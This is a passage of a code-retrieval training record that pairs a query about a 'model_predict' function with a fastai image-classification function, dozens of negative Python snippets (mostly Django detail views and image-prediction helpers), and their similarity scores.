\"genre\")\n while genre:\n if genre.firstChild and len(genre.firstChild.data) > 0:\n self.genres.append(genre.firstChild.data)\n genre = next_sibling(genre, \"genre\")\n\n # Thumbs have not only url's, but they can have informative attributes\n # so we store this data all as a Dict.. it will always at least have\n # the 'url' key.\n #\n thumbs = first_child(ep, \"thumbs\")\n if thumbs:\n thumb = first_child(thumbs, \"thumb\")\n while thumb:\n td = { \"url\" : thumb.firstChild.data }\n attrs = thumb.attributes\n for i in range(0,attrs.length):\n attr = attrs.item(i)\n td[attr.name] = attr.value\n self.thumbs.append(td)\n thumb = next_sibling(thumb, \"thumb\")\n\n fanart = first_child(ep, \"fanart\")\n if fanart:\n # The 'url' attribute of the <fanart> tag is the base url for the\n # poster images and their previews. We do not store that, we just\n # construct the full urls.\n #\n url_base = fanart.getAttribute(\"url\")\n\n self.fanart = []\n\n thumb = first_child(fanart, \"thumb\")\n while thumb:\n self.fanart.append(url_base + thumb.firstChild.data)\n thumb = next_sibling(thumb, \"thumb\")\n\n episodeguide = first_child(ep, \"episodeguide\")\n if episodeguide:\n url = first_child(episodeguide, \"url\")\n while url:\n self.episode_guide_urls.append(\\\n ScrapeURL(url,cache = self.scraper.cache,\n base_url = self.base_url))\n url = next_sibling(url, \"url\")\n\n # And at this point we have parsed out all of the series specific\n # data from our XML response, and also got a handle on where to get\n # the episode information.\n #\n dom.unlink()\n dom = None\n return", "def detail(request, slug, template='contacts/person/detail.html'):\n\n if not request.user.is_authenticated():\n return HttpResponseRedirect('/login/?next=%s' % request.path)\n\n try:\n person = Person.objects.get(slug__iexact=slug)\n\n if not request.session:\n request.session={}\n\n viewed_list = request.session.get('viewed',[])\n if person in viewed_list:\n viewed_list.remove(person)\n viewed_list.insert(0,person) # d'aquesta manera estara al final\n del viewed_list[8:10] # eliminam si hi ha moltes\n request.session['viewed'] = viewed_list\n\n except Person.DoesNotExist:\n raise Http404\n\n kwvars = {\n 'object': person,\n }\n\n return render_to_response(template, kwvars, RequestContext(request))", "def show_info(self):\n txt = \"Brand: %s\\nModel: %s\\nHostname: %s\\n\"%(self.brand, self.model, self.hostname)\n return txt", "def fetch_show_information (self, id, type):\n # check if we have a show or a movie, the request made depends on this\n if type == 'show':\n paths = [\n ['videos', id, ['requestId', 'regularSynopsis', 'evidence']],\n ['videos', id, 'seasonList', 'current', 'summary']\n ]\n else:\n paths = [['videos', id, ['requestId', 'regularSynopsis', 'evidence']]]\n response = self._path_request(paths=paths)\n return self._process_response(response=response, component='Show information')", "def news_detail(request, pk, slug=None):\n item = get_object_or_404(models.NewsItem.objects, pk=pk)\n\n return render(request, 'news/detail.html', {\n 'object': item,\n })", "def service_details(request, service_id):\n\n service = get_object_or_404(Service, pk=service_id)\n creator_profile = UserProfile.objects.all()\n\n template = 'services/service-details.html'\n context = {\n 'service': service,\n 'creator_profile': creator_profile,\n }\n\n return render(request, template, context)", "def callback_Details(mod, currentMods, window):\n detailMod = currentMods[mod]\n detailText = brf.print_Details(mod, currentMods)\n sg.popup(detailText)\n # window['detailText'].update('Details for {}:\\n{}'.format(mod, detailText))\n\n return None", "def get_details(self):\n raise Exception(\"bad details\")", "def detail(request, article_id):\n return render(request, 'knowledgebase/detail.html', {'article_id': article_id})", "def detail_speaker(request, pk, slug, template=\"core/detail_speaker.html\"):\n try:\n speaker = Speaker.objects.get(pk=pk, slug=slug)\n except Speaker.DoesNotExist:\n raise Http404(_(u'Houve algum problema tentando obter o palestrate! Você tem certeza de que ele existe?'))\n\n response = { 'speaker': speaker, 'show_all_info': True }\n return direct_to_template(request, template, response)", "def info(self, id):", "def GetBasicInformation(self):\n if self.cur_uid is None:\n return\n self._get_product_detail_id()", "def location_details(self, **kwargs):\n \n self.options.update(kwargs)\n self.options['action'] = 'locator.location.details'\n return self.call(self.options)", "def show_details(self):\n self.close_button.pack_forget()\n self.timer = 11\n\n DetailScreen(self.master, self.detail_frame, self.user)", "def get_detail(self, appid):\n item = {}\n detail = self.details(appid)\n if not detail.docV2.docid:\n raise AppNotFoundError(appid)\n item[\"appid\"] = appid\n item[\"version_code\"] = detail.docV2.details.appDetails.versionCode\n item[\"offer_type\"] = detail.docV2.offer[0].offerType\n category = detail.docV2.details.appDetails.appCategory[0]\n item[\"category_id\"] = CATEGORY_MAP[category]\n item[\"description\"] = detail.docV2.descriptionHtml\n # detect the string language from description, return ISO 639-1 language code.\n item[\"lang\"] = unicode(guess_language(item[\"description\"] or 'en'))\n item[\"developer\"] = detail.docV2.details.appDetails.developerName\n item[\"group\"] = GROUP_MAP.get(detail.docV2.details.appDetails.appType) or 'app'\n item[\"icon\"] = [img.imageUrl for img in detail.docV2.image if img.imageType == 4][0]\n item[\"is_deleted\"] = False\n item[\"name\"] = detail.docV2.title\n # for url seo\n name = re.sub(ur\"\"\"\\$|\\%|\\(|\\)|\\[|\\[|\\]|\\*|\\ |\\®|\\#|\\~|\\`|\\@|\\^|\\&|\\{|\\}|\\<|\\>|\\?|\\\"|\\'|\\’|\\–|\\:|\\;|\\||\\/|\\+|\\!|\\•|\\,|\\™|\\_|\\.\"\"\", '-', item['name'])\n name_url = urllib.quote(name.encode('utf-8'))\n if \"%\" not in name_url:\n item['name_url'] = name_url\n item[\"operating_systems\"] = \"\"\n item[\"order\"] = 0\n item[\"rating\"] = detail.docV2.aggregateRating.starRating\n item['rating_user'] = humanize.intcomma(detail.docV2.aggregateRating.ratingsCount)\n\n total_count = detail.docV2.details.appDetails.numDownloads\n item[\"total_count\"] = remove_downloads(total_count)\n item[\"download_count\"] = strCount_to_intCount(total_count)\n\n item[\"release_time\"] = detail.docV2.details.appDetails.uploadDate\n item[\"screenshot\"] = [img.imageUrl for img in detail.docV2.image if img.imageType == 1]\n item[\"update_info\"] = detail.docV2.details.appDetails.recentChangesHtml\n item[\"version\"] = detail.docV2.details.appDetails.versionString\n item[\"offer_type\"] = detail.docV2.offer[0].offerType\n item[\"size\"] = humanize.naturalsize(detail.docV2.details.appDetails.installationSize, gnu=True)\n item[\"source\"] = 'crawler'\n item[\"channel\"] = 'googleplay'\n item[\"price\"] = detail.docV2.offer[0].formattedAmount.lower()\n item[\"paid\"] = 1\n item[\"search_order\"] = 0\n item[\"search_reindex\"] = 1\n item['app_status'] = 0\n\n return item", "def reservation_details():\n session_id = request.args.get('session-id', None)\n user_id = request.args.get('user-id', None)\n reservation_id = request.args.get('reservation-id', None)\n reservation = get_reservation_identified_by_id(reservation_id)\n car = get_car_identified_by_id(reservation.id_car)\n date_from = str(reservation.date_from)\n date_to = str(reservation.date_to)\n total_price = get_total_price(reservation_id)\n if check_authentication(session_id, user_id) and is_reservation_of_the_user(reservation_id, user_id):\n return render_template('car_reservation_details.html', user=user_id, session_id=session_id, car=car,\n reservation_id=reservation_id, date_from=date_from,\n date_to=date_to, total_price=total_price)\n else:\n return render_template('home.html', cars_list=get_cars_preview(), news_list=get_news_list(), authjs=False,\n preview_length=get_cars_preview().__len__(), del_session_cookie=True)", "def detail(self):\n return self.status[\"health\"][\"detail\"]", "def show_research(self):\n self.list_research = orm_imp.read_research()\n print(\"========================================================\")\n for row in self.list_research:\n print(\n row[\"date\"], \"|| Produit :\", row['subcat'],\n \"|| Meilleure proposition :\", row['product'], \"| Score :\",\n row['nutriscore'], \"| Lien :\", row['url'],\n \"| Ingrédients :\", row['ingredient'])\n print(\"========================================================\")", "def details(self, packageName, get_raw=False):\n path = \"details?doc=%s\" % requests.utils.quote(packageName)\n raw_response = self.execute_request_raw(path)\n message = self.executeRequestApi2(path, raw_response=raw_response)\n if get_raw:\n return message.payload.detailsResponse, raw_response\n return message.payload.detailsResponse", "def details(self) -> \"dict\":\n return self._attrs.get(\"details\")", "def product_detail(request, product_id):\n\n all_products = Product.objects.filter(is_holiday=False)\n product = get_object_or_404(all_products, pk=product_id)\n\n context = {\n 'product': product,\n }\n\n return render(request, 'products/product_detail.html', context)", "def product_detail(request, product_id):\n # Search for product in Product Model using pk identifier obtained from project_id\n product = get_object_or_404(Product, pk=product_id)\n context = {\n 'product': product,\n }\n return render(request, 'products/product_detail.html', context)" ]
[ "0.6816689", "0.67486215", "0.6713748", "0.65807945", "0.65807945", "0.65807945", "0.65140444", "0.6467318", "0.6412233", "0.6406499", "0.63699645", "0.62743896", "0.62667674", "0.6252862", "0.6249236", "0.6226553", "0.619854", "0.61578506", "0.61264884", "0.61043566", "0.6066991", "0.6046339", "0.59840244", "0.5963111", "0.5929335", "0.59094274", "0.5889149", "0.5875752", "0.5870319", "0.5869933", "0.5858689", "0.5850795", "0.5843654", "0.58434194", "0.58401316", "0.58401316", "0.5818446", "0.57871073", "0.5783813", "0.5777939", "0.57236356", "0.57221955", "0.57084656", "0.57073176", "0.57072043", "0.5703722", "0.5697758", "0.56694794", "0.5654853", "0.5640192", "0.5633732", "0.56313723", "0.5627708", "0.5621521", "0.56197035", "0.55979866", "0.5581042", "0.55798435", "0.5573981", "0.55531687", "0.5540334", "0.55267924", "0.55168384", "0.5499161", "0.54870015", "0.54799", "0.54716223", "0.5466719", "0.54493403", "0.54430336", "0.54428494", "0.54377514", "0.54374367", "0.54353833", "0.5429963", "0.5429382", "0.5422704", "0.5417768", "0.54134256", "0.54047203", "0.5402637", "0.54021555", "0.54011273", "0.5400975", "0.53972465", "0.53952116", "0.5381824", "0.5381085", "0.53704834", "0.53676677", "0.53646886", "0.5362929", "0.53603196", "0.535755", "0.535496", "0.5350697", "0.5346694", "0.53410876", "0.53398484", "0.5334841", "0.5333072" ]
0.0
-1
model_predict will return the preprocessed image
def model_predict(img_path, model_path): learn = load_model(model_path) img = open_image(img_path) # get the outputs from the model pred_class,pred_idx,outputs = learn.predict(img) # return the classification the model returns return pred_class
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def predict(model, img):\n\tx = image.img_to_array(img)\n\tx = np.expand_dims(x, axis=0)\n\tx = preprocess_input(x)\n\tpreds = model.predict(x)\n\treturn preds[0]", "def predict(model, img, target_size=(229, 229)): #fixed size for InceptionV3 architecture\r\n if img.size != target_size:\r\n img = img.resize(target_size)\r\n\r\n x = image.img_to_array(img)\r\n x = np.expand_dims(x, axis=0)\r\n x = preprocess_input(x)\r\n preds = model.predict(x)\r\n return preds[0]", "def model_predict(img, model, preprocess_func):\n img = img.resize((224, 224)) # Each model expects shape: (224, 224, 3)\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n\n x = preprocess_func(x)\n preds = model.predict(x)\n return preds", "def predict(image_path):\n img = image.load_img(image_path, target_size=image_size)\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n predictions = model.predict(x)\n plt.imshow(img)\n print('Predicted:', decode_predictions(predictions, top=1)[0])\n return decode_predictions(predictions, top=1)[0]", "def predict(model, img, target_size):\n if img.size != target_size:\n img = img.resize(target_size)\n\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n preds = model.predict(x)\n return preds[0]", "def predict(model, img, target_size):\n if img.size != target_size:\n img = img.resize(target_size)\n\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n preds = model.predict(x)\n return preds[0]", "def predict(model, images):\n return model.predict_classes(images)", "def model_predict(img_path):\n img = open_image(img_path)\n pred_class, pred_idx, outputs = learn.predict(img)\n print(pred_class)\n return pred_class", "def predict(self, img):\n return self._predict([img])[0]", "def predict(image_path):\n global graph\n with graph.as_default():\n image_size = (299, 299)\n img = image.load_img(image_path, target_size=image_size)\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n predictions = model.predict(x)\n print('Predicted:', decode_predictions(predictions, top=1)[0])\n return decode_predictions(predictions, top=1)[0]", "def predict(model, img, imgSize):\n \n #Reajusta o tamanho da imagem para o tamanho esperado caso necessario.\n if img.size != imgSize :\n img = img.resize(imgSize)\n\n #Converte a imagem num array tridimensional.\n x = image.img_to_array(img)\n x = numpy.expand_dims(x, axis=0)\n #Normaliza a imagem.\n x = preprocess_input(x)\n \n #Faz a previsao atraves da rede.\n pred = model.predict(x)\n return imagenet_utils.decode_predictions(pred, top=5)[0]", "def predict(model, img, target_size, top_n=3):\r\n print('img.size=',img.size)\r\n if img.size != target_size:\r\n img = img.resize(target_size)\r\n \r\n x = image.img_to_array(img)\r\n x = np.expand_dims(x, axis=0)\r\n x = preprocess_input(x)\r\n preds = model.predict(x)\r\n return decode_predictions(preds,top=top_n)[0]", "def predict(self, images, batch_size):\n pass", "def predict(input_shape, model, image_path):\n \n # Load and resize the image using PIL.\n img = PIL.Image.open(image_path)\n print('input_shape: ', input_shape)\n img_resized = img.resize(input_shape, PIL.Image.LANCZOS)\n\n # Plot the image.\n plt.imshow(img_resized)\n plt.show()\n\n # Convert the PIL image to a numpy-array with the proper shape.\n img_array = np.expand_dims(np.array(img_resized), axis=0)\n\n # Use the ResNet50 model to make a prediction.\n # This outputs an array with 1000 numbers corresponding to\n # the classes of the ImageNet-dataset.\n pred = model.predict(img_array)\n \n # Decode the output of the ResNet50 model.\n pred_decoded = decode_predictions(pred)[0]\n\n # Print the predictions.\n for code, name, score in pred_decoded:\n print(\"{0:>6.2%} : {1}\".format(score, name))\n \n return", "def predict(self, image):\n\n if self.__preprocess != None:\n image = self.__preprocess(image)\n\n result = self.__model.predict(image)\n\n if self.__postprocess != None:\n result = self.__postprocess(result)\n\n return result", "def predict_one_image(img_path, prediction_model):\n # Load image and resize it\n img = image.load_img(img_path, target_size=(224, 224))\n # Transform it in array\n x = image.img_to_array(img)\n # Expand array dimension\n x = np.expand_dims(x, axis=0)\n # Make prediction\n prediction_score = prediction_model.predict(x)\n return prediction_score", "def singlePrediction(self,img):\n self.optimizer = SGD(lr = 0,momentum=0,decay = 0)\n self.createModel()\n output = self.model.predict(np.expand_dims(img,axis = 0))\n return output", "def predict_data(img): \n return gennet.predict_data(img, 'Resnet50')", "def prediction(self, X):\n images = self.preprocess_images(X)\n return self.model.predict(images)", "def predict(cls, image_path: str) -> tuple:\n\n print(\"Classify input image: \")\n return cls.model.predict(image_path)", "def predict(self, img_path):\n\n img = cv2.imread(img_path)\n img0 = img.copy()\n \n #This happens inside datasets\n # Convert\n img = letterbox(img, new_shape=self.img_size)[0]\n\n # Convert\n img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416\n img = np.ascontiguousarray(img)\n \n #this happens on detect\n img = torch.from_numpy(img).to(self.device)\n img = img.float() # uint8 to fp16/32\n img /= 255.0 # 0 - 255 to 0.0 - 1.0\n if img.ndimension() == 3:\n img = img.unsqueeze(0)\n\n # Inference\n pred = self.model(img)[0]\n\n # Apply NMS\n pred = non_max_suppression(pred, self.conf_thres, self.iou_thres, classes=self.classes, agnostic=self.agnostic_nms)\n \n # Process detections\n for i, det in enumerate(pred): # detections per image\n if det is not None and len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(img.shape[2:], det[:, :4], img0.shape).round()\n\n pred = [d.cpu().detach().numpy() for d in pred if d is not None]\n pred = pred[0] if len(pred) else pred\n \n pred = [[[x1, y1, x2, y2],conf] for x1, y1, x2, y2, conf, clss in pred]\n\n return pred", "def predict(self, image_to_predict):\n\n y_pred = self.classifier.predict(image_to_predict)\n\n return y_pred", "def _predict_image(im, net, transformer):\n\n net.blobs[\"data\"].data[...] = transformer.preprocess(\"data\", im)\n out = net.forward()\n\n probs = out[\"prob\"][0]\n prob_cloud = probs[1] * 100.0\n return prob_cloud", "def predict(model, input_file):\n if input_file.endswith(\".json\"):\n with open(input_file,\"w\") as fd:\n data = json.loads(input_file)\n else:\n data = imread(input_file)\n result = model.predict(data)\n print(\"Model predicted class: %s\"%result)\n return result", "def predict(self, sess, img_data):\n\n with sess.as_default():\n new_image = self.preprocess(img_data, self.input_shape)\n input_feed = self.create_input_feed(sess, new_image, img_data)\n output_fetch = self.create_output_fetch(sess)\n all_classes, all_scores, all_bboxes = sess.run(output_fetch, input_feed)\n\n return all_classes, all_scores, all_bboxes", "def warmup_predict(model, imgs, Npred):\n H = augmented_state_matrix(model[:-1], imgs, 0)\n h0 = H[-2]\n y0 = imgs[-1]\n return predict(model, y0, h0, Npred)", "def predict(self, request):\r\n f = request.files['image']\r\n \r\n img = Image.open(f)\r\n \r\n image = img.convert('RGB')\r\n \r\n image_np = load_image_into_numpy_array(image)\r\n output_dict = run_inference_for_single_image(model, image_np)\r\n vis_util.visualize_boxes_and_labels_on_image_array(\r\n image_np,\r\n output_dict['detection_boxes'],\r\n output_dict['detection_classes'],\r\n output_dict['detection_scores'],\r\n category_index,\r\n instance_masks=output_dict.get('detection_masks_reframed', None),\r\n use_normalized_coordinates=True,\r\n line_thickness=2, \r\n min_score_thresh=0.45, \r\n skip_scores=True)\r\n \r\n result_image = Image.fromarray(image_np)\r\n \r\n raw_bytes = BytesIO()\r\n result_image.save(raw_bytes, \"PNG\")\r\n \r\n return base64.b64encode(raw_bytes.getvalue()).decode(\"utf-8\")", "def predictImage(model, image):\n # Reshape\n x = image[np.newaxis, ::]\n\n # Standardise range\n x = x.astype(np.float32) / 255.\n\n # Prediction\n preds = model.predict(x)[0].reshape(image.shape[0],\n image.shape[0],\n model.layers[-1].output_shape[-1])\n # class_img\n class_img = np.argmax(preds, axis=-1)\n\n return (preds, class_img)", "def predict(self): \n return self.model.predict(self.test_x)", "def post(self):\n result = {'status': 'error'}\n\n args = input_parser.parse_args()\n input_data = args['image'].read()\n image = self.model_wrapper._read_image(input_data)\n preds = self.model_wrapper._predict(image)\n\n # Modify this code if the schema is changed\n label_preds = [{'label_id': p[0], 'label': p[1], 'probability': p[2]} for p in [x for x in preds]]\n result['predictions'] = label_preds\n result['status'] = 'ok'\n\n return result", "def prediction_on_a_image(self, input, output,model_saved_path):\n\n # load the saved model\n if os.path.isfile(model_saved_path) is False:\n raise IOError('trained model: %s not exist' % model_saved_path)\n\n clf = joblib.load(model_saved_path)\n\n # split a large image to many small ones\n patch_w = 500 # parameters.get_digit_parameters(\"\", \"train_patch_width\", None, 'int')\n patch_h = 500 # parameters.get_digit_parameters(\"\", \"train_patch_height\", None, 'int')\n overlay_x = 0 # parameters.get_digit_parameters(\"\", \"train_pixel_overlay_x\", None, 'int')\n overlay_y = 0 # parameters.get_digit_parameters(\"\", \"train_pixel_overlay_y\", None, 'int')\n\n img_folder = os.path.dirname(input)\n img_name = os.path.basename(input)\n inf_list_txt = 'inf_image_list.txt'\n with open(inf_list_txt, 'w') as txt_obj:\n txt_obj.writelines(img_name + '\\n')\n\n img_patches = build_RS_data.make_dataset(img_folder, inf_list_txt, patch_w, patch_h, overlay_x, overlay_y,\n train=False)\n\n for img_idx, aImg_patches in enumerate(img_patches):\n inf_output_dir = 'inf_results' #os.path.splitext(img_name)[0]\n os.system('mkdir -p '+inf_output_dir)\n os.system('rm '+inf_output_dir+'/*')\n\n ## parallel inference patches\n # but it turns out not work due to the Pickle.PicklingError\n # not working due to mulitple parameters. Jan 9, 2019, hlc\n # use multiple thread\n num_cores = multiprocessing.cpu_count()\n print('number of thread %d' % num_cores)\n # theadPool = mp.Pool(num_cores) # multi threads, can not utilize all the CPUs? not sure hlc 2018-4-19\n theadPool = Pool(num_cores) # multi processes\n\n # inference_one_patch_svm(img_idx, image_count, p_idx, patch_count, inf_output_dir, img_patch, scaler,clf)\n\n parameters_list = [\n (img_idx, len(img_patches), idx, len(aImg_patches), inf_output_dir, img_patch, self._scaler, clf)\n for (idx, img_patch) in enumerate(aImg_patches)]\n # results = theadPool.map(inference_one_patch_svm, parameters_list) # not working\n results = theadPool.starmap(inference_one_patch_svm, parameters_list) # need python3\n print('result_list', results)\n\n # for p_idx, img_patch in enumerate(aImg_patches):\n # # read images\n # patch_data = build_RS_data.read_patch(img_patch) # read_whole_x_pixels(input)\n #\n # nbands, height, width = patch_data.shape\n #\n # X_predit = patch_data.reshape(nbands, -1)\n # X_predit = np.transpose(X_predit, (1, 0))\n #\n # if os.path.isfile(scaler_saved_path) and self._scaler is None:\n # self._scaler = joblib.load(scaler_saved_path)\n # result = self._scaler.transform(X_predit)\n # X = result.tolist()\n # elif self._scaler is not None:\n # result = self._scaler.transform(X_predit)\n # X = result.tolist()\n # else:\n # X = X_predit\n # basic.outputlogMessage('warning, no pre-processing of data before prediction')\n #\n # # more method on prediction can be foudn in :\n # # https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html\n # pre_result = clf.predict(X)\n # result_img = pre_result.reshape((height, width))\n #\n # # save results\n # print('Save patch:%d/%d on Image:%d/%d , shape:(%d,%d)' %\n # (p_idx,len(aImg_patches), img_idx,len(img_patches), result_img.shape[0], result_img.shape[1]))\n #\n # # short the file name to avoid error of \" Argument list too long\", hlc 2018-Oct-29\n # file_name = \"I%d_%d\" % (img_idx, p_idx)\n #\n # save_path = os.path.join(inf_output_dir, file_name + '.tif')\n # build_RS_data.save_patch_oneband_8bit(img_patch,result_img.astype(np.uint8),save_path)\n #\n # with rasterio.open(input) as src_obj:\n # # Set spatial characteristics of the output object to mirror the input\n # kwargs = src_obj.meta\n # kwargs.update(\n # dtype=rasterio.uint8,\n # count=1)\n # # Create the file\n # with rasterio.open(output, 'w', **kwargs) as dst:\n # dst.write_band(1, result_img.astype(rasterio.uint8))\n # basic.outputlogMessage(\"save to %s\" % output)\n\n return True", "def predict_car():\n img = open_image(request.files['image'])\n pred_class, pred_idx, outputs = learn.predict(img)\n return str(pred_class)", "def predict() -> Any:\n threshold = request.form.get(\"threshold\", type=float)\n source_size = request.form.get(\"source_size\", type=bool)\n images = request.files.getlist(\"images\")\n result = {}\n for image in images:\n input_image = prepare_input(image)\n if input_image is not None:\n output_image = model.predict(input_image, threshold, source_size)\n if output_image is not None:\n result[image.filename] = prepare_output(output_image)\n else:\n result[image.filename] = None\n else:\n result[image.filename] = None\n return result", "def make_prediction(*, input_image):\n \n pipeline = Pipeline(model)\n resized_image = pipeline.resize_image(input_image)\n prediction = argmax(pipeline.make_prediction(resized_image))\n \n return prediction", "def predict(model, np_image, topk, gpu):\n\n # Convert image to tensor\n np_image = np.expand_dims(np_image, axis=0)\n img_tensor = torch.from_numpy(np_image)\n # Convert to float\n float_tensor = img_tensor.type(torch.FloatTensor)\n \n image_pred = float_tensor.to('cuda')\n \n model.eval()\n \n with torch.no_grad():\n outputs = model(image_pred)\n \n probs = torch.exp(outputs) \n # Find topk \n probs, labels = probs.topk(k=topk) \n # From torch to numpy to lists\n if gpu == True:\n probs, labels = probs.to('cpu'), labels.to('cpu')\n probs, labels = probs.numpy(), labels.numpy()\n probs, labels = probs[0].tolist(), labels[0].tolist()\n \n idx_to_class = {val: key for key, val in \n model.class_to_idx.items()}\n # Map labels to class in index\\\n labels = [idx_to_class[lab] for lab in labels]\n return probs, labels", "def predict(self, data: np.array) -> np.array:\n return self.model.predict(squeeze_keep_batch(data))", "def predict():\r\n \r\n data = {\"success\": False}\r\n if flask.request.files.get(\"image\"):\r\n # read image from request\r\n image = flask.request.files[\"image\"].read()\r\n # convert image to BGR\r\n image = read_image_bgr(io.BytesIO(image))\r\n # preprocess image for model\r\n image = preprocess_image(image, mode='pass')\r\n image, scale = resize_image(image)\r\n data[\"scale\"] = scale\r\n\r\n # process image\r\n with graph.as_default():\r\n start_time = time.time()\r\n # generate prediction bounding boxes, scores, and labels on the input image\r\n boxes, scores, labels = model.predict(np.expand_dims(image, axis=0))\r\n # add inference time to data dictionary\r\n data[\"time\"] = time.time() - start_time\r\n\r\n # add prediction boxes, scores, & labels to data dictionary\r\n data[\"predictions\"] = {\"boxes\": boxes.tolist(),\r\n \"scores\": scores.tolist(),\r\n \"labels\": labels.tolist()}\r\n\r\n # prediction was successful\r\n data[\"success\"] = True\r\n \r\n # return the data dictionary as a JSON response\r\n return flask.jsonify(data)", "def predict(image):\n with tf.Session(graph=graph) as session:\n saver = tf.train.Saver()\n saver.restore(session, \"saved_models/model12.ckpt\")\n print(\"Model restored.\")\n feed_dict = {tf_sample_dataset : image}\n predictions = session.run(train_prediction, feed_dict=feed_dict)\n # Prints an array of softmax probabilities for each digit in the number\n print str(predictions)\n return np.argmax(predictions, 2)", "def fit_predict(self):\n self.classifier = self.model\n self.classifier.fit(self.X_sample, self.y_sample)\n self.y_pred = self.classifier.predict(self.X_test)", "def predict_from_model(patch, model):\n\n prediction = model.predict(patch.reshape(1, 256, 256, 3))\n prediction = prediction[:, :, :, 1].reshape(256, 256)\n return prediction", "def get_predictions(self, img):\n \n predictions = self.tf_model.predict_proba(img)\n prediction = np.argmax(predictions, axis=-1)\n \n return prediction", "def predict(trained_model, X_test, y_test, image_name):\n if MODEL == 1:\n return predict_1(trained_model, X_test, y_test)\n elif MODEL == 3:\n if CROSS_VALIDATION:\n return cv_predict_3(trained_model, X_test, y_test)\n else:\n return predict_3(trained_model, X_test, y_test, image_name)\n elif MODEL == 2:\n return predict_2(trained_model, X_test, y_test)\n else:\n # For models 4, 5 and 6\n return predict_4(trained_model, X_test, y_test)", "def predict(trainer, img_path, patch_size, device='cpu'):\n\n img = imread(img_path)\n patches = divide_image_to_patches(img, patch_size)\n predictions = []\n\n for patch in patches:\n input_ = TF.to_tensor(Image.fromarray(patch)).to(device).unsqueeze(0)\n prediction = trainer.postprocess(trainer.model(input_))\n prediction = prediction.detach().cpu().numpy()\n predictions.append(prediction[..., np.newaxis])\n\n predictions = np.concatenate(predictions)\n\n return combine_patches_to_image(predictions, img.shape[0], img.shape[1])", "def classify(img, c_model):\n #global class_graph\n\n #img = load_img(im_path,target_size=(input_height, input_width))\n #img = img_to_array(img)\n im_size = 128\n # resize \n\n img = cv2.resize(img, (im_size,im_size))\n\n img = img.astype(\"float\") / 255.0\n img = np.expand_dims(img, axis=0)\n with class_graph.as_default():\n predictions = c_model.predict(img)[0]\n\n return predictions", "def target_predict(self, inp):\n return self.target_model.predict(inp)", "def class_predict(trained_model, X_test, y_test, image_name):\n if MODEL == 1:\n return class_predict_3(trained_model, X_test, y_test, image_name)\n elif MODEL == 3:\n return class_predict_3(trained_model, X_test, y_test, image_name)\n elif MODEL == 2:\n return class_predict_2(trained_model, X_test, y_test)\n else:\n # For models 4, 5 and 6\n return class_predict_3(trained_model, X_test, y_test, image_name)", "def predict(self, data, version='default'):\n return self.skil.api.transformimage(\n deployment_name=self.deployment.name,\n image_transform_name=self.model_name,\n version_name=version,\n files=data\n )", "def predict(self, x):\n return self.model.predict(x, batch_size=1, verbose=0)", "def predict(self):\n self.canv.update()\n ps = self.canv.postscript(colormode='mono')\n img = Image.open(io.BytesIO(ps.encode('utf-8')))\n img.save('result.png')\n x = Predict.transform_image(self)\n \n #prediction with multivariate regression\n Y_hat_test = self.multivariate_model.predict([x])\n C_multivariate = map(np.argmax, Y_hat_test) # classification vector\n C_multivariate = list(C_multivariate)\n multivariate_predict = C_multivariate[0]\n\n \n #prediction with Linear Discriminant Analysis (LDA)\n lda_predict = self.lda_model.predict([x])[0]\n qda_predict = self.qda_model.predict([x])[0]\n log_predict = self.log_model.predict([x])[0]\n \n baseline_label = Label(self, text='Baseline: ' + str(multivariate_predict) )\n baseline_label.grid(row=0, column=1, padx=5, pady=5)\n lda_label = Label(self, text=' LDA: '+ str(lda_predict))\n lda_label.grid(row=0, column=2, padx=5, pady=5)\n qda_label = Label(self, text='QDA: '+ str(qda_predict))\n qda_label.grid(row=1, column=1, padx=5, pady=5)\n log_label = Label(self, text=' Logistic: '+str(log_predict))\n log_label.grid(row=1, column=2, padx=5, pady=5)", "def predict(self, img):\n logger.info(\"predict() for %s\" %threading.current_thread())\n\n #detect face from the image\n face, rect = self.detect_face(img)\n\n if face is None or rect is None:\n #print(\"No face found for img \", type(img))\n return None, None, None, None\n\n if self.redis_server_password is None:\n # No training data available. Just perform detection and return\n # an error message in the subject value.\n warning = \"Training data not available. Redis password not set.\"\n subject = \"No Training Password\" # This will be displayed with the face\n confidence = 0\n logger.warning(\"%s\" %warning)\n return None, subject, confidence, rect\n\n #predict the image using our face recognizer\n label, confidence = self.face_recognizer.predict(face)\n #get name of respective label returned by face recognizer\n label_text = self.face_recognizer.getLabelInfo(label)\n logger.info(\"label=%s label_text=%s\" %(label, label_text))\n\n # print(label_text, confidence, rect)\n return img, label_text, confidence, rect", "def predict(self, data):\n return self.model.predict(data, batch_size=data.shape[1])", "def predict(self, input):\n input = input.reshape((input.shape[0], 1))\n return self.feedforward(input)", "def predict_step(self, *args: Any, **kwargs: Any) -> Tensor:\n batch = args[0]\n x = batch[\"image\"]\n y_hat: Tensor = self(x).softmax(dim=1)\n return y_hat", "def predict_file(img_path, model):\n return gennet.predict_file(img_path, 'Resnet50', model)", "def Predict_image(image_path, model, show_img = True):\n test_image, preprocessed_image = Preproces_image(image_path)\n predictions = model.predict(preprocessed_image)\n prediction = Configs.CLASS_NAMES[np.argmax(predictions)]\n if show_img:\n plt.imshow(test_image)\n plt.title(prediction)\n plt.axis(\"off\")\n plt.show()\n return print(f\"Predictiona: {prediction}\")\n else:\n return print(f\"Predictiona: {prediction}\")", "def model_predict(self, X):\n return self.cmodel.predict(X=X)", "def predict(self, image, normalize=True):\n\n # Image preprocessing\n image = cv2.resize(image, (224, 224), interpolation=cv2.INTER_CUBIC)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # Array preprocesing\n image = np.moveaxis(image, -1, 0)\n image = np.array([image], dtype=np.float64)\n\n rep = self.model.predict(image)\n\n if normalize:\n return rep.astype(np.float64) / np.linalg.norm(rep)\n\n else:\n return rep.astype(np.float64)", "def predict(self, to_predict):\n\t\treturn self.model.predict(to_predict)", "def predict(cls, input):\n clf = cls.get_model()\n print('input=')\n print(input)\n return clf.predict(input)", "def predict():\n # initialize the data 